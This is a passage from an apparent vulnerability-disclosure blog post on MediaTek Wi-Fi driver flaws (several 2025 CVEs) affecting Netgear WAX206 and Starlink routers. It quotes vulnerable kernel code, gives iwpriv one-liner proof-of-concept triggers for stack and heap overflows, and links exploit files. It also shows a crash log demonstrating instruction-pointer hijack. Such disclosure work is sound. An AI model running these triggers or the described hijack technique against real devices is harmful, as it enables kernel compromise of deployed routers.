		<span class="n">ret</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="n">upnp_data_struct</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
		<span class="p">}</span>
	<span class="p">}</span>
<span class="err">}</span>
</code></pre></div></div>

<h4 id="poc-9">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20733.c">PoC Link</a></p>

<p>Execute the PoC with a large bufsize argument:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./poc ra0 2048
</code></pre></div></div>

<h3 id="cve-2025-20734-heap-overflow-in-set_secwpapsk_proc">CVE-2025-20734: Heap Overflow in Set_SecWPAPSK_Proc</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0, MT7629 v6.0.3.0, MT7981 driver v7.6.7.2</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed), SpaceX Starlink Wifi Gen2</li>
  <li><strong>Requirements</strong>: <code class="language-plaintext highlighter-rouge">CONFIG_AP_SUPPORT</code> and <code class="language-plaintext highlighter-rouge">WSC_AP_SUPPORT</code> must be enabled in the build configuration.</li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">Set_WPAPSK_Proc()</code> when processing an attacker-controlled argument string. The function first checks if the length of the argument string is less than 65. If so, it enters a block where the key data is set. However, if the length exceeds 65, the function does not treat this as an error and continues execution.</p>

<p>If the <code class="language-plaintext highlighter-rouge">WSC_STA_SUPPORT</code> build flag was enabled, the vulnerable code block is included in the function and is reached after the check above. Within this block:</p>

<ol>
  <li>The length of the attacker-controlled argument string is calculated using <code class="language-plaintext highlighter-rouge">strlen()</code></li>
  <li>The length value is used as the length argument in a call to <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code> to write to <code class="language-plaintext highlighter-rouge">dev-&gt;ctrl.WpaPsk</code></li>
</ol>

<p>No bounds checking is performed on the length of the argument string before this copy operation. Since <code class="language-plaintext highlighter-rouge">ctrl-&gt;WpaPsk</code> is statically sized at 64 bytes, any argument string longer than 64 bytes will overflow the buffer. Additionally, because <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code> is used for the copy operation, there are no restrictions on the payload data, allowing the attacker to include null bytes or other arbitrary data in the overflow.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">Set_WPAPSK_Proc</span><span class="p">(</span><span class="n">adapter_obj</span> <span class="o">*</span><span class="n">obj</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">arg</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="cp">#ifdef WSC_STA_SUPPORT
</span>    <span class="c1">// @hypr: VULNERABLE</span>
    <span class="n">NdisMoveMemory</span><span class="p">(</span><span class="n">dev</span><span class="o">-&gt;</span><span class="n">ctrl</span><span class="p">.</span><span class="n">WpaPsk</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">arg</span><span class="p">));</span>
<span class="cp">#endif
</span><span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-10">PoC</h4>

<p>Execute the commands below on a system running the vulnerable driver to trigger the bug.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv ra0 <span class="nb">set </span><span class="nv">WPAPSK</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*8000)"</span><span class="si">)</span>

<span class="c"># force use of corrupted pointers</span>
iwpriv ra0 <span class="nb">set </span><span class="nv">WscConfStatus</span><span class="o">=</span>2
</code></pre></div></div>

<h3 id="cve-2025-20735-heap-overflow-in-mtk_send_offchannel_action_frame">CVE-2025-20735: Heap Overflow in mtk_send_offchannel_action_frame</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
  <li><strong>Requirements</strong>: Driver must be built with <code class="language-plaintext highlighter-rouge">DPP_SUPPORT</code> configuration option (this should also enable the <code class="language-plaintext highlighter-rouge">CHANNEL_SWITCH_MONITOR_CONFIG</code> flag)</li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">mtk_send_offchannel_action_frame()</code>. The function allocates a fixed-size heap buffer <code class="language-plaintext highlighter-rouge">OutBuffer</code> of 2304 bytes using the <code class="language-plaintext highlighter-rouge">MlmeAlloc()</code> macro. However, the function subsequently calls <code class="language-plaintext highlighter-rouge">MakeOutgoingFrame()</code> to copy attacker-controlled data into this buffer without validating the size of the data.The size of the data to be copied is determined by the <code class="language-plaintext highlighter-rouge">frm-&gt;frm_len</code> field, which is passed from userspace via the IOCTL handler. If an attacker specifies a value larger than 2304 bytes, the <code class="language-plaintext highlighter-rouge">memmove()</code> operation in <code class="language-plaintext highlighter-rouge">MakeOutgoingFrame()</code> will write beyond the bounds of the allocated buffer, resulting in a heap buffer overflow.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span>
    <span class="p">...</span>
    <span class="c1">// Allocate a fixed-size buffer of 2304 bytes</span>
    <span class="n">status</span> <span class="o">=</span> <span class="n">MlmeAlloc</span><span class="p">(</span><span class="n">pAd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">pOutBuffer</span><span class="p">);</span>
	<span class="p">...</span>
    <span class="c1">// Vulnerable: No bounds checking on frm-&gt;frm_len</span>
    <span class="n">MakeOutgoingFrame</span><span class="p">(</span><span class="n">OutBuffer</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">FrameLen</span><span class="p">,</span>
                      <span class="k">sizeof</span><span class="p">(</span><span class="n">HEADER_802_11</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">Hdr</span><span class="p">,</span>
                      <span class="n">frm</span><span class="o">-&gt;</span><span class="n">frm_len</span><span class="p">,</span> <span class="n">frm</span><span class="o">-&gt;</span><span class="n">frm</span><span class="p">,</span>
                      <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-11">PoC</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20735.c">PoC Link</a></p>

<p>Compile and execute the PoC like this:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./poc ra0 5000
</code></pre></div></div>

<h3 id="cve-2025-20736-stack-overflows-in-set_igmpsn_addentry_proc-and-set_igmpsn_delentry_proc">CVE-2025-20736: Stack Overflows in Set_IgmpSn_AddEntry_Proc and Set_IgmpSn_DelEntry_Proc</h3>

<p><em>This was another fun one. This pair of Add/Delete functions both contain basically the same bug which results in a buffer overflow. MediaTek argued that one of these was a duplicate by their definition because, and I kid you not, the two bugs occur in the same <strong>file</strong>.</em></p>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
  <li><strong>Requirement</strong>: <code class="language-plaintext highlighter-rouge">VENDOR_FEATURE6_SUPPORT</code> enabled</li>
</ul>

<h4 id="set_igmpsn_delentry_proc">Set_IgmpSn_DelEntry_Proc</h4>
<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">Set_IgmpSn_DelEntry_Proc()</code> when handling parsing of an IP address value from the argument string passed in from userspace. In this block, a <code class="language-plaintext highlighter-rouge">for</code> loop is used together with calls to <code class="language-plaintext highlighter-rouge">rstrtok()</code> using the <code class="language-plaintext highlighter-rouge">.</code> character as a separator to parse the individual octets of the IP address string. Within this loop, there is no bounds checking done on the <code class="language-plaintext highlighter-rouge">i</code> iterator variable to ensure it does not exceed the size of the <code class="language-plaintext highlighter-rouge">ip_addr[4]</code> buffer prior to using the <code class="language-plaintext highlighter-rouge">i</code> variable to index into the <code class="language-plaintext highlighter-rouge">ip_addr[]</code> buffer when writing the parsed numeric value from the argument token using <code class="language-plaintext highlighter-rouge">strtol()</code>. This results in an OOB write condition that can be used to corrupt the kernel stack if a string with more than 4 “.” characters is found.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">while</span> <span class="p">((</span><span class="n">c</span> <span class="o">=</span> <span class="n">strsep</span><span class="p">((</span><span class="kt">char</span> <span class="o">**</span><span class="p">)</span><span class="o">&amp;</span><span class="n">input</span><span class="p">,</span> <span class="s">"-"</span><span class="p">))</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">value</span> <span class="o">=</span> <span class="n">rstrtok</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="s">"."</span><span class="p">);</span> <span class="n">value</span><span class="p">;</span> <span class="n">value</span> <span class="o">=</span> <span class="n">rstrtok</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="s">"."</span><span class="p">))</span> <span class="p">{</span>
				<span class="p">...</span>
                <span class="c1">// unbounded for loop with rstrtok will keep reading as long as '.' are found</span>
                <span class="n">ip_addr</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="p">)</span><span class="n">strtol</span><span class="p">(</span><span class="n">value</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span>
                <span class="n">i</span><span class="o">++</span><span class="p">;</span>
            <span class="p">}</span>
		<span class="p">...</span>
        <span class="p">}</span>
</code></pre></div></div>

<p>The vulnerability can be triggered using the following payload, which sends an overlong sequence formatted reach the bug.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># trigger the bug by sending overlong '65.' sequence</span>
iwpriv ra0 <span class="nb">set </span><span class="nv">IgmpDel</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s1">'print("65."*200)'</span><span class="si">)</span>
</code></pre></div></div>

<h4 id="set_igmpsn_addentry_proc">Set_IgmpSn_AddEntry_Proc</h4>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">Set_IgmpSn_AddEntry_Proc()</code> when handling parsing of an IP address value from the argument string passed in from userspace. The vulnerable logic for this function is identical to that shown in <code class="language-plaintext highlighter-rouge">Set_IgmpSn_DelEntry_Proc()</code> above.</p>

<p>The vulnerability can be triggered using the following payload, which sends an overlong sequence formatted reach the bug.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># trigger the bug in the Add handler</span>
iwpriv ra0 <span class="nb">set </span><span class="nv">IgmpAdd</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('65.'*400)"</span>
</code></pre></div></div>

<h3 id="cve-2025-20737-stack-overflow--info-leak-in-oid_802_11_passphrases-handler">CVE-2025-20737: Stack Overflow + Info Leak in OID_802_11_PASSPHRASES Handler</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
</ul>

<p>The vulnerability occurs in the handler for <code class="language-plaintext highlighter-rouge">OID_802_11_PASSPHRASES</code> (0x0536). The code creates a fixed-size stack structure <code class="language-plaintext highlighter-rouge">NDIS80211PSK psk</code> and then uses <code class="language-plaintext highlighter-rouge">copy_from_user()</code> to copy data from user space into this structure without validating that the incoming data size matches the structure size. The size of the structure is 68 bytes, meaning any length value greater than 68 will result in kernel stack corruption. Additionally, the code goes on to use whatever value is in the struct member <code class="language-plaintext highlighter-rouge">WPAKeyLen</code> to print that many bytes from the contents of the <code class="language-plaintext highlighter-rouge">WPAKey[]</code> buffer without any bounds checking, resulting in disclosure of kernel memory to userspace in the kernel message buffer (dmesg).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="n">OID_802_11_PASSPHRASES</span><span class="p">:</span> <span class="p">{</span>
	<span class="p">...</span>
    <span class="c1">// stack allocated struct</span>
    <span class="n">NDIS80211PSK</span> <span class="n">psk</span><span class="p">;</span>
	<span class="p">...</span>
    <span class="c1">// VULNERABLE - copies user-provided data of arbitrary length into fixed stack buffer</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">copy_from_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">psk</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">pointer</span><span class="p">,</span> <span class="n">wrq</span><span class="o">-&gt;</span><span class="n">u</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">length</span><span class="p">);</span>
	<span class="p">...</span>
    <span class="c1">// VULNERABLE - uses user-provided length value to dump the contents of the WPAKey buffer, resulting in information leak if a size</span>
    <span class="c1">// larger than the WPAKey buffer is provided.</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span> <span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">psk</span><span class="p">.</span><span class="n">WPAKeyLen</span> <span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
        <span class="n">debug_log</span><span class="p">((</span><span class="s">"%c"</span><span class="p">,</span> <span class="n">psk</span><span class="p">.</span><span class="n">WPAKey</span><span class="p">[</span><span class="n">i</span><span class="p">]));</span>
<span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-12">PoC</h4>

<p><a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20737.c">PoC Link</a></p>

<p>Execute the PoC below with the following parameters:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./poc ra0 0x8536 1600
</code></pre></div></div>

<h3 id="cve-2025-20738-stack-overflow-in-set_apscan_proc">CVE-2025-20738: Stack Overflow in Set_ApScan_Proc</h3>

<ul>
  <li><strong>Affected versions</strong>: MT7622 v5.1.0.0, MT7629 v6.0.3.0</li>
</ul>

<p>The <code class="language-plaintext highlighter-rouge">Set_ApScan_Proc()</code> function contains a <code class="language-plaintext highlighter-rouge">while</code> loop that reads characters from the input argument string and writes them to a fixed-size stack buffer <code class="language-plaintext highlighter-rouge">dest[33]</code>. The loop continues until it encounters a NULL byte in the input string. The issue is that there’s no check to ensure that the index <code class="language-plaintext highlighter-rouge">i</code> used to access the <code class="language-plaintext highlighter-rouge">dest</code> array remains within bounds (0-32). If the input string is longer than 33 bytes and doesn’t contain a colon (<code class="language-plaintext highlighter-rouge">:</code>) or NULL byte within the first 33 characters, the loop will write beyond the bounds of the <code class="language-plaintext highlighter-rouge">dest[]</code> array, causing a stack buffer overflow.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span>
	<span class="p">...</span>
    <span class="kt">char</span> <span class="n">dest</span><span class="p">[</span><span class="mi">33</span><span class="p">];</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">arg</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">!=</span> <span class="sc">'\0'</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// VULNERABLE - unbounded write to temp[i]</span>
        <span class="n">dest</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">arg</span><span class="p">[</span><span class="n">j</span><span class="p">];</span>
        <span class="n">j</span><span class="o">++</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">dest</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="sc">':'</span> <span class="o">||</span> <span class="n">arg</span><span class="p">[</span><span class="n">j</span><span class="p">]</span> <span class="o">==</span> <span class="sc">'\0'</span><span class="p">)</span> <span class="p">{</span>
	        <span class="c1">// break</span>
        <span class="p">}</span>
        <span class="n">i</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-13">PoC</h4>

<p>Execute the command below on a system running the vulnerable driver to trigger the bug.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv ra0 <span class="nb">set </span><span class="nv">ApScanChannel</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*1000)"</span><span class="si">)</span>
</code></pre></div></div>

<h3 id="cve-2025-20739-stack-overflow-in-set_igmpsn_blacklist_proc">CVE-2025-20739: Stack Overflow in Set_IgmpSn_BlackList_Proc</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
  <li><strong>Requirements</strong>:
    <ul>
      <li>Configuration: IGMP Snooping enabled, IGMP TV mode enabled</li>
      <li>Required features/build flags: <code class="language-plaintext highlighter-rouge">IGMP_TVM_SUPPORT</code>, <code class="language-plaintext highlighter-rouge">IGMP_SNOOP_SUPPORT</code>, <code class="language-plaintext highlighter-rouge">CONFIG_VENDOR_FEATURE10_SUPPORT</code></li>
    </ul>
  </li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">Set_IgmpSn_BlackList_Proc()</code> when copying the argument string in <code class="language-plaintext highlighter-rouge">arg</code> to the fixed-size char buffer <code class="language-plaintext highlighter-rouge">IPString[100]</code> using <code class="language-plaintext highlighter-rouge">NdisMoveMemory()</code>. The size argument given for the copy operation is calculated by measuring the length of the string in <code class="language-plaintext highlighter-rouge">arg</code> (the source buffer) without any upper-bounds check to ensure the length of the argument string does not exceed the size of the destination buffer. An argument string which contains more than 100 characters will result in a buffer overflow of the <code class="language-plaintext highlighter-rouge">IPString[]</code> buffer.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="kt">char</span> <span class="n">ip_str</span><span class="p">[</span><span class="mi">100</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="sc">'\0'</span><span class="p">};</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">p_ip_str</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="p">...</span>
    <span class="k">do</span> <span class="p">{</span>
		<span class="p">...</span>
        <span class="n">p_ip_str</span> <span class="o">=</span> <span class="n">ip_str</span><span class="p">;</span>
		<span class="c1">// @hypr: VULNERABLE</span>
        <span class="n">NdisMoveMemory</span><span class="p">(</span><span class="n">p_ip_str</span><span class="p">,</span> <span class="n">arg</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">arg</span><span class="p">));</span>
</code></pre></div></div>

<h4 id="poc-14">PoC</h4>

<p>Execute the command below on a system running the vulnerable driver to trigger the bug.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv ra0 <span class="nb">set </span><span class="nv">IgmpSnExemptIP</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*200)"</span><span class="si">)</span>
</code></pre></div></div>

<h3 id="cve-2025-20741-heap-overflow-in-vie_oper_proc">CVE-2025-20741: Heap Overflow in vie_oper_proc</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
</ul>

<p>The function <code class="language-plaintext highlighter-rouge">vie_oper_proc()</code> in the <code class="language-plaintext highlighter-rouge">mt7622_mt_wifi</code> driver is vulnerable to a heap buffer overflow when handling the incoming command string passed in via the <code class="language-plaintext highlighter-rouge">ioctl()</code> handler and <code class="language-plaintext highlighter-rouge">iwpriv</code> interface. The overflow happens due to a lack of length restrictions on the parsing of a string token using <code class="language-plaintext highlighter-rouge">sscanf()</code> on the incoming string. This value is parsed and written to a heap allocated buffer, which can result in a heap buffer overflow if the length of the token exceeds the size of the allocated buffer. In this case, the size of the allocated buffer is calculated with the expression <code class="language-plaintext highlighter-rouge">sizeof((MAX_VENDOR_IE_LEN + 1) * 2)</code>, which incorrectly calculates the size of the result of the arithmetic expression rather than using the result of the expression (as appears to be the intent). In effect, the allocation will always be for <code class="language-plaintext highlighter-rouge">sizeof(unsigned int)</code> bytes (4).</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>    <span class="k">if</span> <span class="p">(</span><span class="n">arg</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// @hypr: VULNERABLE on last `%s` field into `ctnt`</span>
        <span class="n">input_argument</span> <span class="o">=</span> <span class="n">sscanf</span><span class="p">(</span><span class="n">arg</span><span class="p">,</span>
                    <span class="s">"%d-frm_map:%x-oui:%6s-length:%d-ctnt:%s"</span><span class="p">,</span>
                    <span class="o">&amp;</span><span class="n">op</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">frm_map</span><span class="p">,</span> <span class="n">oui</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">length</span><span class="p">,</span> <span class="n">ctnt</span><span class="p">);</span>
		<span class="p">...</span>
        <span class="p">}</span>
</code></pre></div></div>

<h4 id="poc-15">PoC</h4>

<p>On a system where the kernel driver is installed, run the following <code class="language-plaintext highlighter-rouge">iwpriv</code> command to issue the IOCTL for the vulnerable code path via the <code class="language-plaintext highlighter-rouge">set</code> command for the <code class="language-plaintext highlighter-rouge">vie_op</code> key.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv ra0 <span class="nb">set </span><span class="nv">vie_op</span><span class="o">=</span>1-frm_map:1-oui:00bbaa-length:1194-ctnt:<span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*600)"</span><span class="si">)</span>
</code></pre></div></div>

<h3 id="cve-2025-20748-kernel-code-execution-via-oob-write-in-setrxvrecorden">CVE-2025-20748: Kernel Code Execution via OOB Write in SetRxvRecordEn</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7622 v5.1.0.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206 (confirmed)</li>
</ul>

<p>The vulnerability occurs in the function <code class="language-plaintext highlighter-rouge">SetRxvRecordEn()</code>, which is the handler for the <code class="language-plaintext highlighter-rouge">iwpriv set RxvRecordEn</code> subcommand. Within this function, an attacker-controlled argument string is parsed using the insecure string function <code class="language-plaintext highlighter-rouge">sscanf()</code> without a length limit or upper bounds check on the length of the argument string. This results in a buffer overflow of the <code class="language-plaintext highlighter-rouge">obj-&gt;RxvFilePath[256]</code> buffer, contained within the device object for the underlying network interface. As there is no upper bounds on the write size, it’s possible to corrupt almost the entirety of the <code class="language-plaintext highlighter-rouge">struct wdev</code> object and beyond.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>		<span class="c1">// @hypr: VULNERABLE</span>
        <span class="n">rv</span> <span class="o">=</span> <span class="n">sscanf</span><span class="p">(</span><span class="n">arg</span><span class="p">,</span> <span class="s">"%d-%d-%d-%d-%d-%d-%d-%d-%s"</span><span class="p">,</span>
            <span class="o">&amp;</span><span class="n">Enable</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">Mode</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">wcid</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">band_idx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g1</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">g2</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">error_en</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">obj</span><span class="o">-&gt;</span><span class="n">RxvFilePath</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
</code></pre></div></div>

<h4 id="poc-corrupt-kernel-memory">PoC: Corrupt Kernel Memory</h4>

<p>To trigger the vulnerability and corrupt memory:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>iwpriv ra0 <span class="nb">set </span><span class="nv">RxvRecordEn</span><span class="o">=</span>1-1-0-1-5-1-5-5-<span class="si">$(</span>python <span class="nt">-c</span> <span class="s2">"print('A'*400)"</span><span class="si">)</span>
</code></pre></div></div>

<p>After running the command, perform an operation that will result in the sending of a notification to enrolled notify handlers. An easy way to do this is to trigger a ‘link down’ operation on the interface via <code class="language-plaintext highlighter-rouge">ifconfig ra0 down</code>. Another option is to use the <code class="language-plaintext highlighter-rouge">iwpriv ra0 set SSID=&lt;anything&gt;</code>, which re-inits the interface and will trigger a notify call. A crash should occur in the function <code class="language-plaintext highlighter-rouge">mt_notify_call_chain()</code> upon access to a corrupted portion of the WifiSysInfo struct in the device struct for the interface.</p>

<h4 id="poc-kernel-ip-control">PoC: Kernel IP Control</h4>

<p><strong>PoC Source</strong>: <a href="https://github.com/mellow-hype/mediarekt-2025/blob/main/cve-2025-20748.c">PoC Link</a></p>

<p>The PoC leverages the vulnerabilty to corrupt the adjacent <code class="language-plaintext highlighter-rouge">WifiSysInfo</code> object to hijack execution flow in the kernel. This object contains linked lists pointing to <code class="language-plaintext highlighter-rouge">struct notify_entry</code> objects, which each contain a function pointer at <code class="language-plaintext highlighter-rouge">notify_entry.notify_caller</code>, so corrupting the pointers in the linked list can be used to point to a fake <code class="language-plaintext highlighter-rouge">struct notify_entry</code> object and use that to hijack execution flow when the embedded callback function is executed. The PoC makes use of a kernel info leak available through the iwpriv <code class="language-plaintext highlighter-rouge">mac</code> subcommand handler to determine the address of memory containing controlled data in the kernel and writes a forged object to align with the <code class="language-plaintext highlighter-rouge">notify_entry</code> structure.</p>

<p>Executing the PoC will result in execution being redirected to the address <code class="language-plaintext highlighter-rouge">0x1337babe1337babe</code> (tested on the <code class="language-plaintext highlighter-rouge">MediaTek MT7622 AX3600-gmac1-WAX206</code> board, Linux 4.x). The output below shows successful control of the instruction pointer.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 2750.312397] [PMF]APPMFInit:: apidx=0, MFPC=1, MFPR=0, SHA256=0
[ 2750.318306] [PMF]PMF_MakeRsnIeGMgmtCipher: Insert BIP to the group management cipher of RSNIE
[ 2750.326896] wifi_sys_linkdown(), wdev idx = 0
[ 2750.331284] Internal error: Oops - SP/PC alignment exception: 8a000000 [#1] PREEMPT SMP
[ 2750.339278] Modules linked in: &lt;snip&gt;
[ 2750.463620] CPU: 0 PID: 13791 Comm: iwpriv Tainted: P                4.4.198 #0
[ 2750.470919] Hardware name: MediaTek MT7622 AX3600-gmac1-WAX206 board (DT)
[ 2750.477698] task: ffffffc01e641600 task.stack: ffffffc01e730000
[ 2750.483610] PC is at 0x37babe1337babe
[ 2750.487424] LR is at mt_notify_call_chain+0x3c/0x58 [mt7622_mt_wifi]
[ 2750.493770] pc : [&lt;0037babe1337babe&gt;] lr : [&lt;ffffff80010b213c&gt;] pstate: 80000145
[ 2750.501154] sp : ffffffc01e733850
[ 2750.504461] x29: ffffffc01e733850 x28: ffffff80012074d8
[ 2750.509773] x27: ffffff80012d35b0 x26: ffffffc019bf2000
[ 2750.515085] x25: ffffff800ae7ac34 x24: ffffffc01dc38485
[ 2750.520397] x23: 0000000000000000 x22: 0000000000000001
[ 2750.525708] x21: 0000000000000005 x20: ffffffc01e7338b0
[ 2750.531020] x19: 0000000000000000 x18: 0000000000000001
[ 2750.536332] x17: 0000007f8633d340 x16: ffffff800815a0b0
[ 2750.541643] x15: 0000000000000000 x14: 00000064000001f4
[ 2750.546955] x13: 0000131100000000 x12: 0002ffba006e0200
[ 2750.552267] x11: 0000000000000000 x10: 0000040404010001
[ 2750.557578] x9 : 0000000604010100 x8 : ffffff800b370f28
[ 2750.562890] x7 : ffffff800ae75e88 x6 : ffffffc01e733a48
[ 2750.568202] x5 : 0000000000000040 x4 : 0000000000000000
[ 2750.573513] x3 : 1337babe1337babe x2 : ffffffc01e7338b0
[ 2750.578825] x1 : 0000000000000005 x0 : ffffffc0150fb010
[ 2750.584137]
</code></pre></div></div>

<h3 id="cve-2025-20742-heap-overflow-in-ft_r1khentryinsert">CVE-2025-20742: Heap Overflow in FT_R1khEntryInsert</h3>

<ul>
  <li><strong>Affected Versions</strong>: MT7915 v7.4.0.0, MT7629 v6.0.3.0</li>
  <li><strong>Affected Devices</strong>: Netgear WAX206, Starlink Wifi Gen2</li>
</ul>

<p>The vulnerability occurs due to a lack of bounds checking on the attacker-controlled values prior to using one of those values as the size argument to a write operation in <code class="language-plaintext highlighter-rouge">FT_R1khEntryInsert()</code>. This function is reached via an ioctl to the RT_PRIV command with subcommand/OID <code class="language-plaintext highlighter-rouge">RT_SET_FT_KEY_RSP</code>, and expects the data sent from userspace to be in the format of a <code class="language-plaintext highlighter-rouge">struct FT_KDP_EVT_KEY_ELM</code> object. This object includes another embedded object of type <code class="language-plaintext highlighter-rouge">FT_KDP_PMK_KEY_INFO</code>, which has members representing the actual key material being transmitted. These members include a statically sized buffer <code class="language-plaintext highlighter-rouge">R0KHID[48]</code> and a size value in <code class="language-plaintext highlighter-rouge">R0KHIDLen</code>, with the latter defining the actual size of the data in <code class="language-plaintext highlighter-rouge">R0KHID[48]</code>.</p>

